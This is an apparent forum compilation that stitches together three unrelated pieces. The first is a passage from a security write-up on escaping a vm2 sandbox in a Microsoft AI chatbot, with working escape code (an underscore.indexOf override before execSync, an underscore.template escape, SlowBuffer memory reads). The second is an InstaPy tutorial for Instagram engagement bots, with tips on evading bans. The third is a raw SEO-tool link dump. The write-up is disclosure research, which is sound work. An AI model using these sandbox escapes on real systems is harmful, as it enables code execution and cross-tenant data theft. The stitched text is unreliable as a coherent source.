sandbox - looking at global variables, we figured we were running inside a vm2 sandbox, a popular Node.js sandboxing library that has since been discontinued due to multiple, unrelated security flaws. The goal was simple: to be able to execute shell commands and try to find a way to access cross-tenant data. How do you usually execute shell commands with Node.js? Simple, you import the child_process module and call exec/execSync: require('child_process').execSync('id') ‍ But you didn’t think it’d be that easy, did you? In general, require inside the vm2 sandbox is a patched version that doesn’t let you import anything harmful. However, Microsoft wanted to provide a few standard modules to make your life easier. So what we have is a custom require function, which has a very specific whitelist of boring modules. But we wanted to understand what’s going on under the hood. Lucky for us, Javascript lets you view the source code of any function. You call .toString() on the function, and voila, you get the source code: (packageName) => { // Do binary search in the allow list of packages if (packagesAllowedList && _.indexOf(packagesAllowedList, packageName, true) < 0) { throw new Error(`**Usage of the '${packageName}' package is not allowed. Please contact your system administrator**`); } return require(packageName); } Looks pretty harmless at first glance. It’s a simple check if the required module is in the whitelisted array, and if it is, the original Node.js require function will be called. Well, if you look closer, they called _.indexOf() instead of the native array indexOf function for some reason. And _.indexOf() is a function from the underscore module. Which is whitelisted. Can you see where we’re going with this? Bypassing the whitelist and achieving remote code execution is no problem when you can just override the indexOf function, which is conveniently already present as a global, you don’t even need to import it. underscore.indexOf=function(){ return 10; }; // Always return 10 - bypass the if condition require('child_process').execSync('id') // Code executed! And then: ‍ Since that backend is shared, we were running as root inside a server that processed the chats of other customers. All research was done in the “debug” environment and was done carefully to not expose any sensitive information. Microsoft quickly patched the bug within 24 hours, but we’re not done with this sandbox yet. ‍ Underscore strikes again After Microsoft patched the require() flaw, we dove deeper into understanding the mechanics of the vm2 sandbox. We knew that the modules that are whitelisted are part of the unisolated Node.js root context, the idea was to look into each module individually and try to find interesting functionalities that can be abused. We spent a few hours reading the documentation and code of all whitelisted modules, most of them were just boring data parsing libraries that didn’t help. But then something in Underscore.js caught our attention: Hmm, a function that compiles JavaScript templates, with an arbitrary code execution feature. We’re sensing a pattern here. To understand why it’s interesting, you need to understand a simple concept of how the vm2 sandboxing works. In simple terms, they create a “bridge” between the sandbox and the host, and everything you execute inside the sandbox goes through proxy functions which restrict what you can do to a very limited set of features. For example, if we try to access the Node.js global “process” variable from within the sandbox, the variable won’t be found as it’s not part of the sandboxed context. However, when you pass down functions from the root context to the sandbox, the code is already “compiled”. It’s usually pretty dangerous since code inside the sandbox can tamper with the modules and cause unexpected behavior outside the sandbox. Back to the template function, since the underscore module was passed down from outside the sandbox, the code will be compiled in the non-sandboxed context, therefore, we can achieve code execution simply: let foo = underscore.template("<% print(this.process.mainModule.require('child_process').execSync('id')) %>") Microsoft quickly patched this as well, and we move on to the final flaw. ‍ A Distant Memory This time we had to think a little bit “outside the box” since we were running out of interesting features in the whitelisted modules. We looked into the “buffer” module which is a built-in Node.js module. The thing that caught our attention was “Buffer.allocUnsafe”. This function lets you allocate an uninitialized memory buffer. To explain what it means in simple terms, let's compare Buffer.alloc and Buffer.allocUnsafe: Buffer.alloc: will provide a memory buffer that is zeroed out. If we try to read from the allocated buffer, we’ll get a bunch of zeroes. Buffer.allocUnsafe: faster than alloc, will provide a memory buffer that hasn’t been zeroed out. That means that if the memory allocated was previously used for an HTTP request for example, we will be able to see the HTTP request by reading from the newly allocated buffer. This is pretty dangerous since if we can use allocUnsafe inside the sandbox, we might be able to access sensitive info from the memory of the application. The vm2 developers were aware of this and restricted the use of Buffer.allocUnsafe. Since the entire buffer module was whitelisted, we had access to SlowBuffer, which is the same as allocUnsafe. This one was not restricted by the sandbox, since it’s not supposed to be there by default: buffer = require('buffer') p = new buffer.SlowBuffer(10024) p.toString() // returns “dirty” uninitialized memory previously used in other areas of the app Running this code a few times yielded interesting data from the application, for example, a few JWT secrets for internal Azure identities, Kubernetes API calls, cross-tenant data, and more. After that, Microsoft made multiple important security changes: They had changed the service architecture to run a completely separate ACI instance per customer. Making any future sandbox breach irrelevant. They changed the sandboxing from vm2 to the isolated-vm library, which uses V8 isolates, a much better and more secure solution. ‍ Final Words This marks the first publication from Breachproof. We aim to publish a lot of more quality research that has real impact. Much more is coming. If you're a company dealing with sensitive data and need help securing it - feel free to contact us. Authored by Yanir Tsarimi Bounty 203,000 $ Source: https://www.breachproof.net/blog/lethal-injection-how-we-hacked-microsoft-ai-chat-bot ‍
  13. Table of Contents How Instagram Bots Work How to Automate a Browser How to Use the Page Object Pattern How to Build an Instagram Bot With InstaPy Essential Features Additional Features in InstaPy 5. Conclusion What do SocialCaptain, Kicksta, Instavast, and many other companies have in common? They all help you reach a greater audience, gain more followers, and get more likes on Instagram while you hardly lift a finger. They do it all through automation, and people pay them a good deal of money for it. But you can do the same thing—for free—using InstaPy! In this tutorial, you’ll learn how to build a bot with Python and InstaPy, a library by Tim Großmann which automates your Instagram activities so that you gain more followers and likes with minimal manual input. Along the way, you’ll learn about browser automation with Selenium and the Page Object Pattern, which together serve as the basis for InstaPy. In this tutorial, you’ll learn: How Instagram bots work How to automate a browser with Selenium How to use the Page Object Pattern for better readability and testability How to build an Instagram bot with InstaPy You’ll begin by learning how Instagram bots work before you build one. How Instagram Bots Work How can an automation script gain you more followers and likes? Before answering this question, think about how an actual person gains more followers and likes. They do it by being consistently active on the platform. They post often, follow other people, and like and leave comments on other people’s posts. Bots work exactly the same way: They follow, like, and comment on a consistent basis according to the criteria you set. The better the criteria you set, the better your results will be. You want to make sure you’re targeting the right groups because the people your bot interacts with on Instagram will be more likely to interact with your content. For example, if you’re selling women’s clothing on Instagram, then you can instruct your bot to like, comment on, and follow mostly women or profiles whose posts include hashtags such as #beauty, #fashion, or #clothes. This makes it more likely that your target audience will notice your profile, follow you back, and start interacting with your posts. How does it work on the technical side, though? You can’t use the Instagram Developer API since it is fairly limited for this purpose. Enter browser automation. It works in the following way: You serve it your credentials. You set the criteria for who to follow, what comments to leave, and which type of posts to like. Your bot opens a browser, types in https://instagram.com on the address bar, logs in with your credentials, and starts doing the things you instructed it to do. Next, you’ll build the initial version of your Instagram bot, which will automatically log in to your profile. Note that you won’t use InstaPy just yet. How to Automate a Browser For this version of your Instagram bot, you’ll be using Selenium, which is the tool that InstaPy uses under the hood. First, install Selenium. During installation, make sure you also install the Firefox WebDriver since the latest version of InstaPy dropped support for Chrome. This also means that you need the Firefox browser installed on your computer. Now, create a Python file and write the following code in it: from time import sleep from selenium import webdriver browser = webdriver.Firefox() browser.get('https://www.instagram.com/') sleep(5) browser.close() Run the code and you’ll see that a Firefox browser opens and directs you to the Instagram login page. Here’s a line-by-line breakdown of the code: Lines 1 and 2 import sleep and webdriver. Line 4 initializes the Firefox driver and sets it to browser. Line 6 types https://www.instagram.com/ on the address bar and hits Enter. Line 8 waits for five seconds so you can see the result. Otherwise, it would close the browser instantly. Line 10 closes the browser. This is the Selenium version of Hello, World. Now you’re ready to add the code that logs in to your Instagram profile. But first, think about how you would log in to your profile manually. You would do the following: Go to https://www.instagram.com/. Click the login link. Enter your credentials. Hit the login button. The first step is already done by the code above. Now change it so that it clicks on the login link on the Instagram home page: from time import sleep from selenium import webdriver browser = webdriver.Firefox() browser.implicitly_wait(5) browser.get('https://www.instagram.com/') login_link = browser.find_element_by_xpath("//a[text()='Log in']") login_link.click() sleep(5) browser.close() Note the highlighted lines: Line 5 sets five seconds of waiting time. If Selenium can’t find an element, then it waits for five seconds to allow everything to load and tries again. Line 9 finds the element <a> whose text is equal to Log in. It does this using XPath, but there are a few other methods you could use. Line 10 clicks on the found element <a> for the login link. Run the script and you’ll see your script in action. It will open the browser, go to Instagram, and click on the login link to go to the login page. On the login page, there are three important elements: The username input The password input The login button Next, change the script so that it finds those elements, enters your credentials, and clicks on the login button: from time import sleep from selenium import webdriver browser = webdriver.Firefox() browser.implicitly_wait(5) browser.get('https://www.instagram.com/') login_link = browser.find_element_by_xpath("//a[text()='Log in']") login_link.click() sleep(2) username_input = browser.find_element_by_css_selector("input[name='username']") password_input = browser.find_element_by_css_selector("input[name='password']") username_input.send_keys("<your username>") password_input.send_keys("<your password>") login_button = browser.find_element_by_xpath("//button[@type='submit']") login_button.click() sleep(5) browser.close() Here’s a breakdown of the changes: Line 12 sleeps for two seconds to allow the page to load. Lines 14 and 15 find username and password inputs by CSS. You could use any other method that you prefer. Lines 17 and 18 type your username and password in their respective inputs. Don’t forget to fill in <your username> and <your password>! Line 20 finds the login button by XPath. Line 21 clicks on the login button. Run the script and you’ll be automatically logged in to to your Instagram profile. You’re off to a good start with your Instagram bot. If you were to continue writing this script, then the rest would look very similar. You would find the posts that you like by scrolling down your feed, find the like button by CSS, click on it, find the comments section, leave a comment, and continue. The good news is that all of those steps can be handled by InstaPy. But before you jump into using Instapy, there is one other thing that you should know about to better understand how InstaPy works: the Page Object Pattern. How to Use the Page Object Pattern Now that you’ve written the login code, how would you write a test for it? It would look something like the following: def test_login_page(browser): browser.get('https://www.instagram.com/accounts/login/') username_input = browser.find_element_by_css_selector("input[name='username']") password_input = browser.find_element_by_css_selector("input[name='password']") username_input.send_keys("<your username>") password_input.send_keys("<your password>") login_button = browser.find_element_by_xpath("//button[@type='submit']") login_button.click() errors = browser.find_elements_by_css_selector('#error_message') assert len(errors) == 0 Can you see what’s wrong with this code? It doesn’t follow the DRY principle. That is, the code is duplicated in both the application and the test code. Duplicating code is especially bad in this context because Selenium code is dependent on UI elements, and UI elements tend to change. When they do change, you want to update your code in one place. That’s where the Page Object Pattern comes in. With this pattern, you create page object classes for the most important pages or fragments that provide interfaces that are straightforward to program to and that hide the underlying widgetry in the window. With this in mind, you can rewrite the code above and create a HomePage class and a LoginPage class: from time import sleep class LoginPage: def __init__(self, browser): self.browser = browser def login(self, username, password): username_input = self.browser.find_element_by_css_selector("input[name='username']") password_input = self.browser.find_element_by_css_selector("input[name='password']") username_input.send_keys(username) password_input.send_keys(password) login_button = browser.find_element_by_xpath("//button[@type='submit']") login_button.click() sleep(5) class HomePage: def __init__(self, browser): self.browser = browser self.browser.get('https://www.instagram.com/') def go_to_login_page(self): self.browser.find_element_by_xpath("//a[text()='Log in']").click() sleep(2) return LoginPage(self.browser) The code is the same except that the home page and the login page are represented as classes. The classes encapsulate the mechanics required to find and manipulate the data in the UI. That is, there are methods and accessors that allow the software to do anything a human can. One other thing to note is that when you navigate to another page using a page object, it returns a page object for the new page. Note the returned value of go_to_log_in_page(). If you had another class called FeedPage, then login() of the LoginPage class would return an instance of that: return FeedPage(). Here’s how you can put the Page Object Pattern to use: from selenium import webdriver browser = webdriver.Firefox() browser.implicitly_wait(5) home_page = HomePage(browser) login_page = home_page.go_to_login_page() login_page.login("<your username>", "<your password>") browser.close() It looks much better, and the test above can now be rewritten to look like this: def test_login_page(browser): home_page = HomePage(browser) login_page = home_page.go_to_login_page() login_page.login("<your username>", "<your password>") errors = browser.find_elements_by_css_selector('#error_message') assert len(errors) == 0 With these changes, you won’t have to touch your tests if something changes in the UI. For more information on the Page Object Pattern, refer to the official documentation and to Martin Fowler’s article. Now that you’re familiar with both Selenium and the Page Object Pattern, you’ll feel right at home with InstaPy. You’ll build a basic bot with it next. How to Build an Instagram Bot With InstaPy In this section, you’ll use InstaPy to build an Instagram bot that will automatically like, follow, and comment on different posts. First, you’ll need to install InstaPy: $ python3 -m pip install instapy This will install instapy in your system. Essential Features Now you can rewrite the code above with InstaPy so that you can compare the two options. First, create another Python file and put the following code in it: from instapy import InstaPy InstaPy(username="<your_username>", password="<your_password>").login() Replace the username and password with yours, run the script, and voilà! With just one line of code, you achieved the same result. Even though your results are the same, you can see that the behavior isn’t exactly the same. In addition to simply logging in to your profile, InstaPy does some other things, such as checking your internet connection and the status of the Instagram servers. This can be observed directly on the browser or in the logs: INFO [2019-12-17 22:03:19] [username] -- Connection Checklist [1/3] (Internet Connection Status) INFO [2019-12-17 22:03:20] [username] - Internet Connection Status: ok INFO [2019-12-17 22:03:20] [username] - Current IP is "17.283.46.379" and it's from "Germany/DE" INFO [2019-12-17 22:03:20] [username] -- Connection Checklist [2/3] (Instagram Server Status) INFO [2019-12-17 22:03:26] [username] - Instagram WebSite Status: Currently Up Pretty good for one line of code, isn’t it? Now it’s time to make the script do more interesting things than just logging in. For the purpose of this example, assume that your profile is all about cars, and that your bot is intended to interact with the profiles of people who are also interested in cars. First, you can like some posts that are tagged #bmw or #mercedes using like_by_tags(): from instapy import InstaPy session = InstaPy(username="<your_username>", password="<your_password>") session.login() session.like_by_tags(["bmw", "mercedes"], amount=5) Here, you gave the method a list of tags to like and the number of posts to like for each given tag. In this case, you instructed it to like ten posts, five for each of the two tags. But take a look at what happens after you run the script: INFO [2019-12-17 22:15:58] [username] Tag [1/2] INFO [2019-12-17 22:15:58] [username] --> b'bmw' INFO [2019-12-17 22:16:07] [username] desired amount: 14 | top posts [disabled]: 9 | possible posts: 43726739 INFO [2019-12-17 22:16:13] [username] Like# [1/14] INFO [2019-12-17 22:16:13] [username] https://www.instagram.com/p/B6MCcGcC3tU/ INFO [2019-12-17 22:16:15] [username] Image from: b'mattyproduction' INFO [2019-12-17 22:16:15] [username] Link: b'https://www.instagram.com/p/B6MCcGcC3tU/' INFO [2019-12-17 22:16:15] [username] Description: b'Mal etwas anderes \xf0\x9f\x91\x80\xe2\x98\xba\xef\xb8\x8f Bald ist das komplette Video auf YouTube zu finden (n\xc3\xa4here Infos werden folgen). Vielen Dank an @patrick_jwki @thehuthlife und @christic_ f\xc3\xbcr das bereitstellen der Autos \xf0\x9f\x94\xa5\xf0\x9f\x98\x8d#carporn#cars#tuning#bagged#bmw#m2#m2competition#focusrs#ford#mk3#e92#m3#panasonic#cinematic#gh5s#dji#roninm#adobe#videography#music#bimmer#fordperformance#night#shooting#' INFO [2019-12-17 22:16:15] [username] Location: b'K\xc3\xb6ln, Germany' INFO [2019-12-17 22:16:51] [username] --> Image Liked! INFO [2019-12-17 22:16:56] [username] --> Not commented INFO [2019-12-17 22:16:57] [username] --> Not following INFO [2019-12-17 22:16:58] [username] Like# [2/14] INFO [2019-12-17 22:16:58] [username] https://www.instagram.com/p/B6MDK1wJ-Kb/ INFO [2019-12-17 22:17:01] [username] Image from: b'davs0' INFO [2019-12-17 22:17:01] [username] Link: b'https://www.instagram.com/p/B6MDK1wJ-Kb/' INFO [2019-12-17 22:17:01] [username] Description: b'Someone said cloud? \xf0\x9f\xa4\x94\xf0\x9f\xa4\xad\xf0\x9f\x98\x88 \xe2\x80\xa2\n\xe2\x80\xa2\n\xe2\x80\xa2\n\xe2\x80\xa2\n#bmw #bmwrepost #bmwm4 #bmwm4gts #f82 #bmwmrepost #bmwmsport #bmwmperformance #bmwmpower #bmwm4cs #austinyellow #davs0 #mpower_official #bmw_world_ua #bimmerworld #bmwfans #bmwfamily #bimmers #bmwpost #ultimatedrivingmachine #bmwgang #m3f80 #m5f90 #m4f82 #bmwmafia #bmwcrew #bmwlifestyle' By default, InstaPy will like the first nine top posts in addition to your amount value. In this case, that brings the total number of likes per tag to fourteen (nine top posts plus the five you specified in amount). Also note that InstaPy logs every action it takes. As you can see above, it mentions which post it liked as well as its link, description, location, and whether the bot commented on the post or followed the author. You may have noticed that there are delays after almost every action. That’s by design. It prevents your profile from getting banned on Instagram. Now, you probably don’t want your bot liking inappropriate posts. To prevent that from happening, you can use set_dont_like(): from instapy import InstaPy session = InstaPy(username="<your_username>", password="<your_password>") session.login() session.like_by_tags(["bmw", "mercedes"], amount=5) session.set_dont_like(["naked", "nsfw"]) With this change, posts that have the words naked or nsfw in their descriptions won’t be liked. You can flag any other words that you want your bot to avoid. Next, you can tell the bot to not only like the posts but also to follow some of the authors of those posts. You can do that with set_do_follow(): from instapy import InstaPy session = InstaPy(username="<your_username>", password="<your_password>") session.login() session.like_by_tags(["bmw", "mercedes"], amount=5) session.set_dont_like(["naked", "nsfw"]) session.set_do_follow(True, percentage=50) If you run the script now, then the bot will follow fifty percent of the users whose posts it liked. As usual, every action will be logged. You can also leave some comments on the posts. There are two things that you need to do. First, enable commenting with set_do_comment(): from instapy import InstaPy session = InstaPy(username="<your_username>", password="<your_password>") session.login() session.like_by_tags(["bmw", "mercedes"], amount=5) session.set_dont_like(["naked", "nsfw"]) session.set_do_follow(True, percentage=50) session.set_do_comment(True, percentage=50) Next, tell the bot what comments to leave with set_comments(): from instapy import InstaPy session = InstaPy(username="<your_username>", password="<your_password>") session.login() session.like_by_tags(["bmw", "mercedes"], amount=5) session.set_dont_like(["naked", "nsfw"]) session.set_do_follow(True, percentage=50) session.set_do_comment(True, percentage=50) session.set_comments(["Nice!", "Sweet!", "Beautiful :heart_eyes:"]) Run the script and the bot will leave one of those three comments on half the posts that it interacts with. Now that you’re done with the basic settings, it’s a good idea to end the session with end(): from instapy import InstaPy session = InstaPy(username="<your_username>", password="<your_password>") session.login() session.like_by_tags(["bmw", "mercedes"], amount=5) session.set_dont_like(["naked", "nsfw"]) session.set_do_follow(True, percentage=50) session.set_do_comment(True, percentage=50) session.set_comments(["Nice!", "Sweet!", "Beautiful :heart_eyes:"]) session.end() This will close the browser, save the logs, and prepare a report that you can see in the console output. Additional Features in InstaPy InstaPy is a sizable project that has a lot of thoroughly documented features. The good news is that if you’re feeling comfortable with the features you used above, then the rest should feel pretty similar. This section will outline some of the more useful features of InstaPy. Quota Supervisor You can’t scrape Instagram all day, every day. The service will quickly notice that you’re running a bot and will ban some of its actions. That’s why it’s a good idea to set quotas on some of your bot’s actions. Take the following for example: session.set_quota_supervisor(enabled=True, peak_comments_daily=240, peak_comments_hourly=21) The bot will keep commenting until it reaches its hourly and daily limits. It will resume commenting after the quota period has passed. Headless Browser This feature allows you to run your bot without the GUI of the browser. This is super useful if you want to deploy your bot to a server where you may not have or need the graphical interface. It’s also less CPU intensive, so it improves performance. You can use it like so: session = InstaPy(username='test', password='test', headless_browser=True) Note that you set this flag when you initialize the InstaPy object. Using AI to Analyze Posts Earlier you saw how to ignore posts that contain inappropriate words in their descriptions. What if the description is good but the image itself is inappropriate? You can integrate your InstaPy bot with ClarifAI, which offers image and video recognition services: session.set_use_clarifai(enabled=True, api_key='<your_api_key>') session.clarifai_check_img_for(['nsfw']) Now your bot won’t like or comment on any image that ClarifAI considers NSFW. You get 5,000 free API-calls per month. Relationship Bounds It’s often a waste of time to interact with posts by people who have a lot of followers. In such cases, it’s a good idea to set some relationship bounds so that your bot doesn’t waste your precious computing resources: session.set_relationship_bounds(enabled=True, max_followers=8500) With this, your bot won’t interact with posts by users who have more than 8,500 followers. For many more features and configurations in InstaPy, check out the documentation. Conclusion InstaPy allows you to automate your Instagram activities with minimal fuss and effort. It’s a very flexible tool with a lot of useful features. In this tutorial, you learned: How Instagram bots work How to automate a browser with Selenium How to use the Page Object Pattern to make your code more maintainable and testable How to use InstaPy to build a basic Instagram bot Read the InstaPy documentation and experiment with your bot a little bit. Soon you’ll start getting new followers and likes with a minimal amount of effort. I gained a few new followers myself while writing this tutorial. If you prefer video tutorials, there is also a Udemy course by the creator of InstaPy Tim Großmann. If there’s anything you’d like to ask or share, then please reach out in the comments below. Source: realpython.com
  14. #beginnersBeginner's Guides SEO SEO News Roundup Beginner's Guide to SEO ContentKing Academy hreflang Guide Google's SEO Guide Bing Webmaster Guide How Google Works by Paul Haahr How Google works for JS Heavy Sites About URLs, LazyLoading, etc Javascript SEO Playlist Plato Web Design SEO Guide How Search works The Anatomy of a Perfect Web Page How Google Crawls a Web Page Webmaster Guidelines Beginner's Guide to Link Building Google Quality Rating Guideline - March 28, 2016 Microsoft Excel for SEOs Google Penalty Removal Web Performance 101 Guide to Website Speed Optimization Log File Analysis for SEO Creative Link Building Ideas Mobile Measurement Glossary Marketing Facebook Blueprint Google Digital Garage How to Start a Startup Ranking Factors Search Engine Ranking Factors Periodic Table Ranking Factors Northcutt Google Ranking Factors #site-auditSite Audit MorningScorePaid SiteProfilerPaid SEMRushPaid SEO Site Checkup Moz On-Page GraderPaid SiteGuru Browseo SEOMatorPaid WooRankPaid Varvy ryte Raven Site Auditor Silktide Nibbler Rocket Validator Tenon.io DareBoost thruuu Mobile Audit Mobile Friendly Test Mobile First Index Checker Mobile-First Auditemail Mobile Moxie Device Emulator Mobi Ready Parito Penalty Checker Enhanced Google Analytics Annotations Website Penalty Indicator Panguin Tool Site Crawlers ContentKingPaid Screaming Frog SEO Spider JetoctopusPaid Netpeak SpiderPaid Sitebulb DeepCrawlPaid BotifyPaid OnCrawlPaid IA Audit Whimsical Octopus.do MindMup MindMeister DYNO Mapper MindNodePaid XMindPaid RarchyPaid Cross-Browser Testing BrowserStackPaid BrowserlingPaid Browser SandboxPaid BrowserShots Browser Plugins View Rendered Source Checkbot MozBar Check My Links Redirect Path Check My Links #a-b-testA/B Testing Omniconvert Google Optimize OptimizelyPaid Visual Website OptimizerPaid AB TastyPaid SEO A/B Tests SanityCheckPaid DistilledODNPaid RankSciencePaid RankSensePaid SEO TestingPaid UpdatablePaid a/b rankingsPaid SparkPaid #adsAds - Promotions Google AdSense Google AdWords BuySellAds Facebook Ads Twitter Ads Pinterest Ads Reddit Advertising Outbrain SyndicateAds Zemanta AdEspresso LinkedIn Advertising Waze Advertising Quora Submission QuuuPaid Startup Lister Instaaa Promote Hour Inspiration Native Advertising Examples Moat AdboxPaid Unicorn Ads DIY Tool BannerBearPaid Bannersnack #ampAMP AMP Validator AMP Page Experience Postlight Mercury AMP by Example Browser Plugins AMP Validator #audienceAudience Sparktoro Facebook Audience Insights Find My Audience #automationsAutomations BabylonTrafficPaid PhantombusterPaid SERP EmpirePaid #data-studioData Studio Google Data Studio Data Studio Templates Keyword data by day CrUX Report #analyticsAnalytics Website Yandex metrica Fullstory Heap Analytics Hotjar Mixpanel Google Analytics Piwik StatCounter WebtrendsPaid Clicky Crazy Egg Segment.io Intercom Observe Baremetrics Keyword Hero Social Media Uprise.io Social Crawlytics Tagboard Shared Count ShareTally PostReach Tools JeptoPaid PaveAI Google Analytics Configuration Tool Referrer Spam Remover GAChecker Training Analytics CoursePaid #appsApps Applyzer Firebase App Indexing The App Launch Checklist #blogsBlogs SEO Moz Search Engine Land SEO by the Sea Search Engine Watch Search Engine Roundtable Backlinko ViperChill Ausisto Insights Marketing Copyblogger BufferApp Blog #chatChat BowtiePaid Drift IntercomPaid Chat Bot MobileMonkey #communitiesCommunities Traffic Think TankPaid IndieHackers Reddit - BigSEO Reddit - TechSEO Moz Q&A WebmasterWorld Black Hat World Warrior Forum #competitorCompetitor Analysis SEMRushPaid SE RankingPaid SimilarWeb Serpstat ahrefs Site ExplorerPaid Browser Plugins Wappalyzer Built With SimilarTech #conferenceConferences SEO TechSEO Boost SearchLove Conference The Inbounder MozCon BlackHatWorld Conference SEO Meetup SMX Advanced Inbound Conductor C3 Conference Marketing Pubcon The Growth Hacking Conference SES Conference Reel Video Summit Content Marketing World South by Southwest Interactive Others SEO conference slides #contentContent ContentlyPaid ScriptedPaid NewsCredPaid KapostPaid CopypressPaid ContentHarmonyPaid Research DashwordPaid TopicPaid NeuralTextPaid BuzzSumoPaid MarketMusePaid ClearScopePaid SocialAnimalPaid SEMRush Content Template Analyzer Frase Surfer Text Tools ryte CognitiveSEO Content Assistant Natural Language Understanding Tone Analyzer Cloud Natural Language API Headline Analyzer nTopic Duplicate Content Copyscape Plagium Quetext Siteliner Inspiration ContentSnippets Hey Nishi Headlime Headline Generator Portent Content Idea Generator Blog Topic Generator Link Bait Title Generator Writing Grammarly Hemingway Browser Plugins Zest.is SEMrush SEO Writing Assistant Extract entities from SERP #content-curationContent Curation Substack Snip.ly Feedly Pocket #conversionsConversions Calls NovocallPaid ResponseiQPaid Calendly PopUp Get Site ControlPaid OptinMonsterPaid #data-enrichmentData Enrichment LeadworxPaid ClearbitPaid MattermarkPaid piplPaid ExperianPaid #data-scrapersData Scrapers AgentyPaid Import.io Docparser ScrapeBoxPaid SERP Scrapers Apify SERP APIPaid Zen SERP Data for SEOPaid Browser Plugins Scraper #domain-toolsDomain Tools NameCheap DNSLookup DNS check DNS Checker Reverse IP DomEye Buy/Sell DomCopPaid 1k ProjectsPaid Investors ClubPaid #e-commerceE-commerce ShopifyPaid WooCommerce Magento Resources Baymard Institute eCommerce Features Matrix Grow My Store #edge-seoEdge SEO SlothPaid RankSensePaid Huckabuy SEO CLoudPaid #emailEmail Worth Exploring Email Markup Gmail Schema Whitelist Request Email CSS Tools Moosend MailerLite MailChimp Revue EmailOctopus MailGun SendPulse NovaPaid SendyPaid SendGrid Betaout AWeberPaid Boomerang SignupSumo Inky's Inliner MailLift MotionMail Email Template Generator Email Testing Inbox Inspector PutsMail LitmusPaid Targeted.io Email on AcidPaid Email Markup Tester Email Sender Reputation Senderbase SenderScore ReputationAuthority BarracudaCentral TrustedSource Email Subject Line Tester Subject Line Test SubjectLine Email Spam Score Email on Acid Litmus Postmark ISnotSpam SpamScoreChecker Postmaster Tools Mail Tester Email Hosting Zoho Email Discovery Email Revealer Elucify Hunter VoilaNorbert Rocket Reach Newsletter Database Newsletter City Upstart.me Paved BuySellAds Email List Validation Email Checker MailTest Email Hippo Email Copy DripScripts Great Email Copy Good Email Copy Good Sales Email Inspiration HTML Email Designs Really Good Emails RivalExplorer NotablistPaid Beetle Browser Plugins Streak Sidekick Rebump FullContact Gmail Autoresponder Clearbit Connect Templates for Gmail Disposable Email Mailinator MailDrop MailDude EmailonDeck 10MinuteMail inboxKitten #enterpriseEnterprise SEO Longtail UXPaid #gamesGames Technical SEO Challenge SEO Pirates the search game HiddenKeywords SEO Crossword Puzzle Where is Larry #growthGrowth Affiliate Program PartnerStack RefersionPaid Smile.io ReferralCandy Viral LoopsPaid Contest Gleam.io RewardsFuel Rafflecopter HeyoPaid Personalization Targeting Monkey Insite #hostingHosting GitHub Pages Digital OceanPaid Netlify Surge Amazon Web ServicesPaid WordPress WordPressPaid KinstaPaid LiquidWebPaid NexcessPaid Managed Cloud Hosting CloudwaysPaid #influencerInfluencer Marketing IntellifluencePaid AssemblyPaid InsensePaid TribePaid ScrunchPaid FamebitPaid TomosonPaid HelloSocietyPaid ReelioPaid Grapevine LogicPaid SocialLadderPaid #instagramInstagram HypeAuditorPaid InsensePaid PicStats Meta Hashtags Instagram Story Templates Bots instato.ioPaid InstazoodPaid #imagesImages Stock Images AllTheFreeStock Image Optimizer Compressor.io Kraken.io Image Editors Fotor Canva Placeit Aesthetic Reverse Image Search Image Raider TinEye Image Delivery Cloudinary Image Analysis Vision AI #keywordsKeywords Keyword Research SERPWoo Keyword Finder Entity Explorer SerpChecker Free Keyword Generator Tool wondersear.ch keyword tool SEMRush Keyword ResearchPaid Autocomplete vs Graph SE RankingPaid SEOMonitor KW Finder Gookey Serpstat WordNet Search Keyword KegPaid Moz Keyword Explorer Sistrix Amazon Keyword Tool ahrefs Keywords ExplorerPaid keyworddit Reddit sense2vec Reddit ngram Keyword Tool Term Explorer Übersuggest LSIGraph Soovle Google Keyword Planner Bing Ads Intelligence Wordstream SERP Keyword Tool WordTrackerPaid Keyword Eye Questions Question DB AnswerThePublic Faq Fox AlsoAsked Question AnalyzerPaid Working with Keywords Add Prefix or Suffix Keyword ClusteringPaid Sentinel Bulk Keyword Generator Moz Keyword DifficultyPaid Merge Words KeywordStudioPaid Word Count Browser Plugins Keyword Surfer WMS Everywhere Keywords EverywherePaid #knowledge-graphKnowledge Graph Knowledge Graph Explorer Knowledge Graph Search #landing-pagesLanding Pages Tools InstapagePaid UnbouncePaid LeadpagesPaid ClickFunnelsPaid Inspiration Screenlane Interfaces.pro SaaS landing page Crayon Land Book Landing Folio Pages.xyz The Best Designs httpster awwwards SiteInspire webdesign-inspiration CSS Winner UI Temple eCommerce Inspiration ecomm.design #link-buildingLink Building LoganixPaid No BSPaid Outreach PetePaid The Upper RanksPaid Citation LabsPaid ContentHarmonyPaid #link-auditLink Audit LinkMinerPaid SEMRushPaid AhrefsPaid Majestic SEOPaid LinkodyPaid Open Site ExplorerPaid LinksSpyPaid OpenLinkProfiler URL ProfilerPaid Netpeak CheckerPaid Link DetoxPaid KerbooPaid Cognitive SEOPaid Monitor BacklinksPaid Markup Helper #localLocal SEO BrightLocalPaid Local VikingPaid GMB Guidelines Checker YextPaid Moz LocalPaid Organization Schema Generator Local SEO Checklist Synup Whitespark myPresences I Search From valentin.app Google Specific Indoor Street View Indoor Maps Google My Business Local Opportunity Finder #log-file-analysersLog File Analysers Screaming Frog Log File Analyser JetoctopusPaid Coralogix Logflare Ryte BotlogsPaid Seolyzer #marketing-automationMarketing Automation Mautic ActiveCampaignPaid User EngagePaid InfusionsoftPaid OntraportPaid ReelevantPaid AutopilotPaid Trigger Events automate.io Zapier TrayPaid If This Then That Microsoft Flow bip.io #newsletterNewsletter tl;dr Marketing Tech Bound SEOFOMO Zero to Marketing The Moz Top 10 SEONotebook Geekout Newsletter #outreachOutreach Mixmax BuzzStreamPaid PitchboxPaid JustReachOut Conspire Charlie App Crystal Onalytica Content #speedPage Speed RequestMap Generator Google Mobile Audit Tool Web Page Test Google PageSpeed Pingdom GTmetrix Persistent Connection Test Load Impact Ping Test Page Speed Revenue Impact Speed Monitor crux.run instant.page Lighthouse CI Diff Optimization Tool Nitropack Browser Plugins Lighthouse #podcastPodcast Experts On The Wire Edge of the Web The Recipe for SEO Success SEO with Mrs Ghost The SEO RANT Search Off the Record Search with Candour Make SEO Simple Again #pressPress Press Mention HARO PressPandaPaid A News TipPaid Submit.co ResponseSourcePaid Muck RackPaid SourceBottle Twitter : #PRRequest Twitter : #JournoRequest Press Release PRLog PR PR-Inside i-Newswire OnlinePRNews PRNewswirePaid PRWebPaid BusinessWirePaid MarketWirePaid PRXPaid PR in a BOXPaid Tools Google News Downloader CoverageBooksPaid #proposalsProposals ProposifyPaid PandaDoc QwilrPaid Quoters #project-managementProject Management Trello Basecamp Notion Asana #proxyProxy BuyProxiesPaid ProxyKeyPaid PIA VPNPaid Proxy Switcher #push-notificationPush 